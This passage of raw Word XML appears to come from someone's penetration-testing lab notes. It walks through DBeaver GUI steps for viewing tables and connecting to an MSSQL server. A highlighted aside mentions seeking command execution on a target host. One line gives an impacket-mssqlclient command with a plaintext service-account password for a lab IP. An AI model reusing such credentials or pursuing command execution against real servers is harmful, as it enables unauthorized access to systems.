    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B58">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Preference (on the bottom)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B59">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Click on User interface drop down</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B5A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Click on appearance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B5B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then for "theme" pick dark</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B5C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B5D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to show navigation bar on the left</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B5E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1073"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to Window</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1073"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Click on Database navigator</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B60">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B61">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to view the data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B62">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="899"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3862388" cy="1701290"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="361" name="image347.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image347.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId544"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3862388" cy="1701290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B63">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="899"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Double click on any table</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="899"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1981200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="188" name="image182.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image182.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId545"/>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1B65">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="899"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Click on "data"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="899"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4799784" cy="3992128"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3" name="image32.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image32.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId546"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4799784" cy="3992128"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="899"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You see all the entries now</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B68">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B69">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B6A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B6B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B6C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to view something</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B6D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4438650" cy="3328988"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="450" name="image479.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image479.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId547"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="443865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1B6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1172"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Right click on something like "Tables"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1172"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then click on "view tables"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1172"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or just drag and drop into the big area on the right</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B71">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B72">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B73">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fgdjharludt2" w:id="225"/>
      <w:bookmarkEnd w:id="225"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to connect to mssql</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B74">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note that I tried getting command execution to work inside of dbeaver for XXXXXXXXX-B .148 and it didn't work. So for command execution, stick to impacket-mssqlclient</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="551"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Click on "Database" and then "new database conncetion" on the top</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B76">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="551"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3759200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="222" name="image223.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image223.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId548"/>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1B77">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="551"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Click on SQL Server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B78">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="551"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4597285" cy="4862513"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="501" name="image485.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image485.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId549"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4597285" cy="4862513"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="551"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Put in your host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="551"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For Authentication, pick NTLM authentication </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B7B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="551"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is like like "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-windows-auth</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" flag when using</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> impacket-mssqlclient sql_svc:Dolphin1@10.10.77.148 -windows-auth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B7C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="551"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Click the boxes for Settings. The last one is for ignoring SSL stuff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B7D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="551"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then click on "Test Connection" on the bottom left and then "Finish"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B7E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="551"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3327400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="221" name="image219.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image219.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId550"/>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1B7F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="551"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To get console stuff to run commands, right click on the "master" on the left, and then click on "SQL Editor" and then click on either "New SQL script" or "Open SQL console"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B80">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B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82">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
